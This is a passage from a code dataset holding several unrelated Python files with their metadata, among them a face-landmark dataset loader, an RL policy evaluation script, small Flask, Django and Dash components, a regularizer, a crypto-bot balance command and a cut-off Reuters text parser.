64\n\n tpts = pts.copy()\n ##复制一份Landmark坐标点\n\n\n for i in range(nparts):\n #逐个坐标点遍历\n if tpts[i, 1] > 0:\n #如果y坐标>0 ? \n tpts[i, 0:2] = transform_pixel(tpts[i, 0:2]+1, center,\n scale, self.output_size, rot=r)\n\n target[i] = generate_target(target[i], tpts[i]-1, self.sigma,\n label_type=self.label_type)\n\n\n ##归一化与ToTensor\n img = img.astype(np.float32)\n img = (img/255.0 - self.mean) / self.std\n img = img.transpose([2, 0, 1])\n target = torch.Tensor(target)\n\n tpts = torch.Tensor(tpts) #转化后所有的的坐标值\n center = torch.Tensor(center) #当前\n\n meta = {'index': idx, 'center': center, 'scale': scale,\n 'pts': torch.Tensor(pts), 'tpts': tpts, 'box_size': box_size}\n\n return img, target, meta\n\n\nif __name__ == '__main__':\n\n pass\n", "sub_path": "lib/datasets/aflw.py", "file_name": "aflw.py", "file_ext": "py", "file_size_in_byte": 4261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PIL.ImageFile.LOAD_TRUNCATED_IMAGES", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PIL.ImageFile", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 76, "usage_type": "call"}, {"api_name": "random.random", "line_number": 81, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 80, "usage_type": "call"}, {"api_name": "random.random", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 83, "usage_type": "call"}, {"api_name": "utils.transforms.fliplr_joints", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.transforms.crop", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.transforms.transform_pixel", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.transforms.generate_target", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "127212026", "text": "import os\nimport csv\nimport torch\nimport numpy as np\nimport time\nimport pdb\nfrom rlkit.torch.policies.make_deterministic import MakeDeterministic\nfrom rlkit.torch.core import eval_np, np_ify\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp_name', type=str, default='t_intersection_lstm4')\nparser.add_argument('--noise', type=float, default=0.05)\nparser.add_argument('--yld', type=float, default=0.5)\nparser.add_argument('--ds', type=float, default=0.1)\nparser.add_argument('--dfd', type=float, default=0.1)\nparser.add_argument('--dfi', type=float, default=0.3)\nparser.add_argument('--epoch', type=int, default=100)\nparser.add_argument('--pre_log', type=str, default='noise0.05yld0.5ds0.1')\nparser.add_argument('--file', type=str, default='params')\nargs = parser.parse_args()\n\npolicies = [\n 'PPOlayer1hidden48ep5000',\n 'PPOSupVanillalayer1hidden48ep5000',\n 'PPOSuplayer1hidden48ep5000',\n 'PPOSupSep2layer1hidden28ep5000',\n 'PPOGNN2llayer1hidden24GSagenode24glayer3actreluep5000',\n 'PPOSupVanillaGNN2llayer1hidden24GSagenode24glayer3actreluep5000',\n 'PPOSupGNN2llayer1hidden24GSagenode24glayer3actreluep5000',\n 'PPOSupSep2GNN2llayer1hidden18GSagenode18glayer3actreluep5000',\n 'PPOSupSep2LSTMGNN2layer1hidden28GSagenode18glayer3suphidden18suplayer1actreluep5000',\n ]\nseeds = [0,1,2]\nextra_name = ''\n\npre_dir = './Data/'+args.exp_name+args.pre_log\nlog_dir = extra_name+'noise'+str(args.noise)+'yld'+str(args.yld)+'ds'+str(args.ds)+'dfd'+str(args.dfd)+'dfi'+str(args.dfi)+'epoch'+str(args.epoch)\nlog_dir = '{}/Eval/{}'.format(pre_dir,log_dir)\nif not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n\nwith open('{}/result.csv'.format(log_dir), mode='w') as csv_file:\n writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['Policy', 'Num Path', 'Return', 'Success Rate', 'Collision Rate', 'Inference Accuracy'])\n\n from traffic.make_env import make_env\n env_kwargs=dict(\n num_updates=1,\n obs_noise=args.noise,\n yld=args.yld,\n driver_sigma=args.ds,\n des_front_gap_difference=args.dfd,\n des_front_gap_interval=args.dfi,\n )\n env = make_env(args.exp_name,**env_kwargs)\n max_path_length = 200\n for policy_path in policies:\n for seed in seeds:\n data_path = '{}/{}/seed{}_load/{}.pkl'.format(pre_dir,policy_path,seed,args.file)\n if os.path.exists(data_path):\n print('_load')\n else:\n data_path = '{}/{}/seed{}/{}.pkl'.format(pre_dir,args.log_dir,args.seed,args.file)\n data = torch.load(data_path,map_location='cpu')\n\n policy = data['trainer/policy']\n eval_policy = MakeDeterministic(policy)\n\n returns = []\n success_num = 0\n collision_num = 0\n inference_correct = 0\n inference_total = 0\n for _ in range(args.epoch):\n o = env.reset()\n policy.reset()\n path_length = 0\n done = False\n c_r = 0.\n while True:\n path_length += 1\n a, agent_info = eval_policy.get_action(o)\n o, r, done, env_info = env.step(a)\n\n if 'intentions' in agent_info.keys():\n intention_probs = agent_info['intentions']\n inffered_intentions = np.argmax(intention_probs,axis=-1)\n true_intentions = env.get_sup_labels()\n valid_mask = ~np.isnan(true_intentions)\n true_intentions = true_intentions[valid_mask]\n inffered_intentions = inffered_intentions[valid_mask]\n inference_correct += np.sum(inffered_intentions==true_intentions)\n inference_total += np.sum(valid_mask)\n else:\n inference_total += 1\n\n c_r += r\n if path_length > max_path_length or done:\n returns.append(c_r)\n if env_info['event'] == 'goal':\n success_num += 1\n elif env_info['event'] == 'collision':\n collision_num += 1\n break\n\n policy_name = '{}_seed{}_{}'.format(policy_path,seed,args.file)\n writer.writerow([policy_name, args.epoch, np.mean(returns),success_num/args.epoch,collision_num/args.epoch,inference_correct/inference_total])\n", "sub_path": "tests/Traffic/t_intersection_lstm/eval_policy.py", "file_name": "eval_policy.py", "file_ext": "py", "file_size_in_byte": 4666, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 44, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "traffic.make_env.make_env", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 65, "usage_type": "call"}, {"api_name": "rlkit.torch.policies.make_deterministic.MakeDeterministic", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "103611834", "text": "\"\"\"Initializes the Penn Medicine masthead\n#! consider moving this into navbar or static\n\"\"\"\nfrom typing import List\n\nfrom dash.development.base_component import ComponentMeta\nfrom dash_html_components import Div, A\n\nfrom chime_dash.app.components.base import Component\n\n\nclass Header(Component):\n \"\"\"\n \"\"\"\n\n localization_file = \"header.yml\"\n\n def get_html(self) -> List[ComponentMeta]:\n \"\"\"Initializes the header dash html\n \"\"\"\n content = self.content\n return [\n Div(\n className=\"penn-medicine-header__content\",\n children=[\n\n A(\n className=\"penn-medicine-header__title\",\n id=\"title\",\n children=content[\"title\"],\n ),\n ],\n )\n ]\n", "sub_path": "src/chime_dash/app/components/header.py", "file_name": "header.py", "file_ext": "py", "file_size_in_byte": 847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "chime_dash.app.components.base.Component", "line_number": 12, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 23, "usage_type": "call"}, {"api_name": "dash_html_components.A", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "dash.development.base_component.ComponentMeta", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "118807098", "text": "from django.contrib.auth.models import User\nfrom Gestion.models import *\nfrom django.contrib.auth.decorators import login_required\n\n@login_required(login_url='/logearse')\ndef pedidosTmpComprador(request):\n\tusuario = Usuario.objects.get(user=request.user)\n\t# usuario = Usuario.objects.get(pk=2)\n\n\ttry:\n\t\tpedidos = PedidoTmp.objects.filter(comprador=usuario.empresa)\n\t\t# pedidos = PedidoTmp.objects.all()\n\n\t\treturn {'pedidos':pedidos,'nombre_empresa':usuario.empresa.nombre_empresa, 'id_empresa':usuario.empresa.id}\n\texcept Usuario.DoesNotExist:\n\t\tprint('dsd')\n\treturn {'pedidos':'vacio','nombre_empresa':usuario.empresa.nombre_empresa, 'id_empresa':usuario.empresa.id}", "sub_path": "Cibercomerciante/Compradores/processor.py", "file_name": "processor.py", "file_ext": "py", "file_size_in_byte": 667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.contrib.auth.decorators.login_required", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "9552432", "text": "from logging import debug\nfrom flask import Flask, render_template, request\nimport numpy as np\nimport joblib\n\napp = Flask(__name__)\n\n# load a model\nmodel = joblib.load('hiring_model.pkl')\n\n@app.route('/')\ndef welcome():\n return render_template('base.html')\n\n@app.route('/predict', methods = ['POST'])\ndef predict():\n\n exp = request.form.get('experience')\n score = request.form.get('test_score')\n interview_score = request.form.get('interview_score')\n\n prediction = model.predict([[int(exp), int(score), int(interview_score)]])\n\n output = round(prediction[0], 2)\n\n return render_template('base.html', prediction_text = f\"Employee salary will be $ {output}\")\n\n\nif __name__== '__main__':\n app.run(debug=True)", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 729, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "442464368", "text": "#!/usr/bin/env python\n\"\"\"A template for creating python scripts. After parsing of the command line\narguments through the function parse_args, the whole application control goes\nto the class App's run method.\n\nThe template has a logger _log being ready. Another _plain_logger for text\nwithout formatting. The reason of using a plain logger instead of \"print\" is\nfor skipping bufferng, which can be an issue if you redirect stdout to a file.\nNotice that _log uses stderr while _plain_logger uses stdout by default.\n_plain_error_logger is similar to _plain_logger but uses stderr.\n\nCommand line options of the script should be added to the parser of the\nfunction parse_args.\n\nThis script depends on the library sorno-py-scripts. You can find out the\ninstallation detail in https://github.com/hermantai/sorno-py-scripts.\n\n\n Copyright 2017 Heung Ming Tai\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\nimport subprocess\nimport sys\n\nfrom sorno import loggingutil\n\n\n_log = logging.getLogger()\n_plain_logger = None # will be created in main()\n_plain_error_logger = None # will be created in main()\n\n\nclass App(object):\n \"\"\"A console application to do work\"\"\"\n def __init__(self, args):\n \"\"\"\n Args:\n args (argparse.Namespace): The flags for the script.\n \"\"\"\n self.args = args\n\n def run(self):\n \"\"\"The entry point of the script\n \"\"\"\n _log.info(\"hello world\")\n _log.debug(\"hello world\")\n _plain_logger.info(\"plain hello world\")\n return 0\n\n def _run_cmd(self, cmd):\n \"\"\"Run a shell command\n\n Args:\n cmd (string or a list of strings): The shell command to run. If\n it's a string, uses the system shell to run the command. If\n it's a list of strings, the first string is the program to run\n and the rest are its arguments. The arguments are quoted\n properly by the subprocess module, so the arguments do not\n have to be quoted when passing to this method.\n \"\"\"\n _log.info(cmd)\n if isinstance(cmd, list):\n use_shell = False\n else:\n use_shell = True\n return subprocess.check_call(cmd, shell=use_shell)\n\n\ndef parse_args(cmd_args):\n description = __doc__.split(\"Copyright 2017\")[0].strip()\n\n parser = argparse.ArgumentParser(\n description=description,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument(\n \"--debug\",\n action=\"store_true\",\n )\n\n args = parser.parse_args(cmd_args)\n return args\n\n\ndef main():\n global _plain_logger, _plain_error_logger\n\n args = parse_args(sys.argv[1:])\n\n loggingutil.setup_logger(_log, debug=args.debug)\n _plain_logger = loggingutil.create_plain_logger(\n \"PLAIN\",\n debug=args.debug,\n )\n _plain_error_logger = loggingutil.create_plain_logger(\n \"PLAIN_ERROR\",\n debug=args.debug,\n stdout=False,\n )\n\n app = App(args)\n sys.exit(app.run())\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "python/script_template.py", "file_name": "script_template.py", "file_ext": "py", "file_size_in_byte": 3779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 84, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 92, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sorno.loggingutil.setup_logger", "line_number": 108, "usage_type": "call"}, {"api_name": "sorno.loggingutil", "line_number": 108, "usage_type": "name"}, {"api_name": "sorno.loggingutil.create_plain_logger", "line_number": 109, "usage_type": "call"}, {"api_name": "sorno.loggingutil", "line_number": 109, "usage_type": "name"}, {"api_name": "sorno.loggingutil.create_plain_logger", "line_number": 113, "usage_type": "call"}, {"api_name": "sorno.loggingutil", "line_number": 113, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "572227402", "text": "from elegy import utils\nimport jax\nfrom elegy.losses.loss import Loss, Reduction\nimport jax.numpy as jnp\nimport haiku as hk\nimport typing as tp\n\n\nclass GlobalL1L2(Loss):\n r\"\"\"\n A regularizer that applies both L1 and L2 regularization penalties.\n\n The L1 regularization penalty is computed as:\n \n $$\n \\ell_1\\,\\,penalty =\\ell_1\\sum_{i=0}^n|x_i|\n $$\n \n The L2 regularization penalty is computed as\n \n $$\\ell_2\\,\\,penalty =\\ell_2\\sum_{i=0}^nx_i^2$$\n\n\n Usage:\n\n ```python\n model = elegy.Model(\n module_fn,\n loss=[\n elegy.losses.SparseCategoricalCrossentropy(),\n elegy.regularizers.GlobalL1L2(l1=1e-5, l2=1e-4),\n ],\n metrics=lambda: elegy.metrics.SparseCategoricalAccuracy(),\n )\n ```\n \n Attributes:\n l1: L1 regularization factor.\n l2: L2 regularization factor.\n \"\"\"\n\n def __init__(\n self,\n l1=0.0,\n l2=0.0,\n reduction: tp.Optional[Reduction] = None,\n name: tp.Optional[str] = None,\n weight: tp.Optional[float] = None,\n ): # pylint: disable=redefined-outer-name\n super().__init__(reduction=reduction, name=name, weight=weight)\n\n self.l1 = l1\n self.l2 = l2\n\n def __apply__(self, params: hk.Params) -> jnp.ndarray:\n \"\"\"\n Computes the L1 and L2 regularization penalty simultaneously.\n\n Arguments:\n params: A structure with all the parameters of the model.\n \"\"\"\n\n regularization: jnp.ndarray = jnp.array(0.0)\n\n if not self.l1 and not self.l2:\n return regularization\n\n if self.l1:\n regularization += self.l1 * sum(\n jnp.sum(jnp.abs(p)) for p in jax.tree_leaves(params)\n )\n\n if self.l2:\n regularization += self.l2 * sum(\n jnp.sum(jnp.square(p)) for p in jax.tree_leaves(params)\n )\n\n return regularization\n", "sub_path": "elegy/regularizers/global_l1l2.py", "file_name": "global_l1l2.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "elegy.losses.loss.Loss", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "attribute"}, {"api_name": "elegy.losses.loss.Reduction", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "attribute"}, {"api_name": "haiku.Params", "line_number": 55, "usage_type": "attribute"}, {"api_name": "jax.numpy.ndarray", "line_number": 63, "usage_type": "attribute"}, {"api_name": "jax.numpy", "line_number": 63, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "jax.numpy.sum", "line_number": 70, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 70, "usage_type": "name"}, {"api_name": "jax.numpy.abs", "line_number": 70, "usage_type": "call"}, {"api_name": "jax.tree_leaves", "line_number": 70, "usage_type": "call"}, {"api_name": "jax.numpy.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 75, "usage_type": "name"}, {"api_name": "jax.numpy.square", "line_number": 75, "usage_type": "call"}, {"api_name": "jax.tree_leaves", "line_number": 75, "usage_type": "call"}, {"api_name": "jax.numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "jax.numpy", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "385215022", "text": "'''\r\nCreated on 28.03.2016\r\n\r\n@author: tobias\r\n'''\r\n\r\nimport time\r\nimport pprint\r\nimport easygui\r\nimport linecache\r\nimport re\r\nfrom random import randint\r\n\r\nprop = \"properties.txt\"\r\n'''\r\nProperties file format:\r\nline 1: popup interval in minutes\r\nline 2: disable for hours\r\nline 3: comma-seperated indices of files being loaded, next line has index 0\r\ntill end: each line a filename (vocabulary txt)\r\n'''\r\n\r\ndef read_data():\r\n data = []\r\n lnStr = linecache.getline(prop, 3)\r\n lnStr.replace(\"\\n\", \"\")\r\n for ln in lnStr.split(\", \"):\r\n lnNum = int(ln) + 3\r\n fn = linecache.getline(prop, lnNum)\r\n fn = fn.replace(\"\\n\", \"\")\r\n f = open(fn)\r\n data = data + f.readlines()\r\n return data\r\n\r\ndef loop(data):\r\n while True:\r\n linenr = randint(0, len(data) - 1)\r\n line = data[linenr]\r\n \r\n line = line.replace(\"\\n\", \"\")\r\n voc = line.split(\"\\t\")\r\n voc = ( re.sub(\"\\{.*\\}\", \"\", voc[0]), re.sub(\"\\{.*\\}\", \"\", voc[1]) ) \r\n \r\n \r\n easygui.msgbox(voc[0] + \" - \" + voc[1], title=\"dictTrainer\")\r\n minInt = int(linecache.getline(prop, 1))\r\n time.sleep(minInt * 60)\r\n linecache.updatecache(prop)\r\n sleepHours = int(linecache.getline(prop, 2))\r\n time.sleep(sleepHours * 3600)\r\n \r\n # change sleep hours back to zero\r\n with open(prop, 'r') as f:\r\n proptemp = f.readlines()\r\n proptemp[1] = \"0\\n\"\r\n with open(prop, 'w') as f:\r\n f.writelines( proptemp )\r\n f.close()\r\n \r\n\r\nif __name__ == \"__main__\":\r\n data = read_data()\r\n pprint.pprint(data)\r\n loop(data)\r\n", "sub_path": "dictTrainer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "linecache.getline", "line_number": 25, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 42, "usage_type": "call"}, {"api_name": "easygui.msgbox", "line_number": 45, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "linecache.updatecache", "line_number": 48, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 49, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "578888809", "text": "from hummingbot.user.user_balances import UserBalances\nfrom hummingbot.core.utils.async_utils import safe_ensure_future\nfrom hummingbot.core.utils.exchange_rate_conversion import ExchangeRateConversion as ERC\nfrom hummingbot.client.config.global_config_map import global_config_map\nimport pandas as pd\nfrom numpy import NaN\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from hummingbot.client.hummingbot_application import HummingbotApplication\n\n\nclass BalanceCommand:\n def balance(self):\n safe_ensure_future(self.show_balances())\n\n async def show_balances(self):\n self._notify(\"Updating balances, please wait...\")\n df = await self.balances_df()\n lines = [\" \" + line for line in df.to_string(index=False).split(\"\\n\")]\n self._notify(\"\\n\".join(lines))\n eth_address = global_config_map[\"ethereum_wallet\"].value\n if eth_address is not None:\n bal = UserBalances.ethereum_balance()\n bal = round(bal, 4)\n self._notify(f\"Ethereum balance in ...{eth_address[-4:]} wallet: {bal} ETH\")\n self._notify(f\"Note: You may have other ERC 20 tokens in this same address (not shown here).\")\n\n async def balances_df(self # type: HummingbotApplication\n ):\n all_ex_bals = await UserBalances.instance().all_balances_all_exchanges()\n ex_columns = [ex for ex, bals in all_ex_bals.items() if any(bal > 0 for bal in bals.values())]\n rows = []\n for exchange, bals in all_ex_bals.items():\n for token, bal in bals.items():\n if bal == 0:\n continue\n token = token.upper()\n if not any(r.get(\"Symbol\") == token for r in rows):\n rows.append({\"Symbol\": token})\n row = [r for r in rows if r[\"Symbol\"] == token][0]\n row[exchange] = round(bal, 4)\n for row in rows:\n ex_total = 0\n for ex, amount in row.items():\n try:\n if ex != \"Symbol\":\n ex_total += ERC.get_instance().convert_token_value_decimal(amount, row[\"Symbol\"], \"USD\")\n except Exception:\n continue\n row[\"Total(USD)\"] = round(ex_total, 2)\n last_row = {\"Symbol\": \"Total(USD)\"}\n for ex in ex_columns:\n token_total = 0\n for row in rows:\n try:\n token_total += ERC.get_instance().convert_token_value_decimal(row[ex], row[\"Symbol\"], \"USD\")\n except Exception:\n continue\n last_row[ex] = round(token_total, 2)\n last_row[\"Total(USD)\"] = round(sum(amount for ex, amount in last_row.items() if ex in ex_columns), 2)\n ex_columns.sort(key=lambda ex: last_row[ex], reverse=True)\n columns = [\"Symbol\"] + ex_columns + [\"Total(USD)\"]\n df = pd.DataFrame(data=rows, columns=columns)\n df = df.replace(NaN, 0)\n df.sort_values(by=[\"Total(USD)\"], inplace=True, ascending=False)\n df = df.append(last_row, ignore_index=True, sort=False)\n return df\n", "sub_path": "hummingbot/client/command/balance_command.py", "file_name": "balance_command.py", "file_ext": "py", "file_size_in_byte": 3133, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 8, "usage_type": "name"}, {"api_name": "hummingbot.core.utils.async_utils.safe_ensure_future", "line_number": 14, "usage_type": "call"}, {"api_name": "hummingbot.client.config.global_config_map.global_config_map", "line_number": 21, "usage_type": "name"}, {"api_name": "hummingbot.user.user_balances.UserBalances.ethereum_balance", "line_number": 23, "usage_type": "call"}, {"api_name": "hummingbot.user.user_balances.UserBalances", "line_number": 23, "usage_type": "name"}, {"api_name": "hummingbot.user.user_balances.UserBalances.instance", "line_number": 30, "usage_type": "call"}, {"api_name": "hummingbot.user.user_balances.UserBalances", "line_number": 30, "usage_type": "name"}, {"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion.get_instance", "line_number": 47, "usage_type": "call"}, {"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion", "line_number": 47, "usage_type": "name"}, {"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion.get_instance", "line_number": 56, "usage_type": "call"}, {"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion", "line_number": 56, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 64, "usage_type": "argument"}]} +{"seq_id": "66200271", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Afnan\r\nNote: some of this is carried over from lab 1\r\n\"\"\"\r\nfrom bs4 import BeautifulSoup\r\nfrom typing import Tuple\r\nimport csv\r\nimport re\r\n# BEGIN PART FROM https://towardsdatascience.com/implementing-a-trie-data-structure-in-python-in-less-than-100-lines-of-code-a877ea23c1a1\r\nclass TrieNode(object):\r\n \"\"\"\r\n Trie node implementation.\r\n \"\"\"\r\n \r\n def __init__(self, char: str):\r\n self.char = char\r\n self.children = []\r\n # Is it the last character of the word.\r\n self.word_finished = False\r\n # How many times this character appeared in the addition process\r\n self.counter = 1\r\n \r\n\r\ndef add(root, word: str):\r\n \"\"\"\r\n Adding a word in the trie structure\r\n \"\"\"\r\n node = root\r\n for char in word:\r\n found_in_child = False\r\n # Search for the character in the children of the present `node`\r\n for child in node.children:\r\n if child.char == char:\r\n # We found it, increase the counter by 1 to keep track that another\r\n # word has it as well\r\n child.counter += 1\r\n # And point the node to the child that contains this char\r\n node = child\r\n found_in_child = True\r\n break\r\n # We did not find it so add a new chlid\r\n if not found_in_child:\r\n new_node = TrieNode(char)\r\n node.children.append(new_node)\r\n # And then point node to the new child\r\n node = new_node\r\n # Everything finished. Mark it as the end of a word.\r\n node.word_finished = True\r\n\r\n\r\ndef find_prefix(root, prefix: str) -> Tuple[bool, int]:\r\n \"\"\"\r\n Check and return \r\n 1. If the prefix exsists in any of the words we added so far\r\n 2. If yes then how may words actually have the prefix\r\n \"\"\"\r\n node = root\r\n # If the root node has no children, then return False.\r\n # Because it means we are trying to search in an empty trie\r\n if not root.children:\r\n return False, 0\r\n for char in prefix:\r\n char_not_found = True\r\n # Search through all the children of the present `node`\r\n for child in node.children:\r\n if child.char == char:\r\n # We found the char existing in the child.\r\n char_not_found = False\r\n # Assign node as the child containing the char and break\r\n node = child\r\n break\r\n # Return False anyway when we did not find a char.\r\n if char_not_found:\r\n return False, 0\r\n # Well, we are here means we have found the prefix. Return true to indicate that\r\n # And also the counter of the last node. This indicates how many words have this\r\n # prefix\r\n return True, node.counter\r\n\r\n# END PART FROM https://towardsdatascience.com/implementing-a-trie-data-structure-in-python-in-less-than-100-lines-of-code-a877ea23c1a1\r\n\r\n# This method works like str.split, but splits for as many times as a delimiter shows up in the doc\r\n# It is also original work based on prior knowledge of how string splits work in Python.\r\ndef multi_splitter(input_string, delimiter): \r\n out_strings = []\r\n new_sub = str(input_string).split(delimiter)\r\n for str_element in new_sub:\r\n sub = str_element.split(\"\")\r\n out_strings.append(sub[0])\r\n return out_strings\r\n\r\n\r\ndef get_text(place, sources, places_bag_vector, t_type):\r\n # This portion involving reading the body text in from the file mostly done by Kumar\r\n print (place)\r\n total_text = \"\"\r\n for source in sources:\r\n with open(source) as f:\r\n data = f.read()\r\n soup = BeautifulSoup(data, 'html.parser') # parse using HTML parser, close to structure of these files\r\n reuters_tags = soup.find_all('reuters')\r\n for reuter_tag in reuters_tags: # get information stored within each reuters tag\r\n if t_type == 'topics':\r\n p_tag = reuter_tag.topics\r\n else:\r\n p_tag = reuter_tag.places\r\n d_tags = p_tag.find_all('d') # find all places/topics mentioned\r\n for d_tag in d_tags:\r\n for child in 